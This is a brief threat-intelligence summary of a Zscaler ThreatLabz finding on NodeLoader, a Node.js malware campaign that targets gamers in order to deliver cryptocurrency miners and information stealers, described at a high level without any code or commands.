NodeLoader Exposed: The Node.js Malware Evading Detection

Description

Zscaler ThreatLabz discovered a malware campaign using Node.js applications for Windows to distribute cryptocurrency miners and information stealers. Named NodeLoader, this malware family employs Node.js compiled executables to deliver second-stage payloads like XMRig, Lumma, and Phemedrone Stealer. The attackers use social engineering, targeting gamers through YouTube and Discord, leading them to malicious websites resembling legitimate gaming platforms. NodeLoader uses the sudo-prompt module for privilege escalation and employs various evasion techniques. The malware downloads and executes PowerShell scripts, which in turn download and run additional payloads. The use of Node.js and large file sizes complicates detection for some security products, resulting in low antivirus detection rates.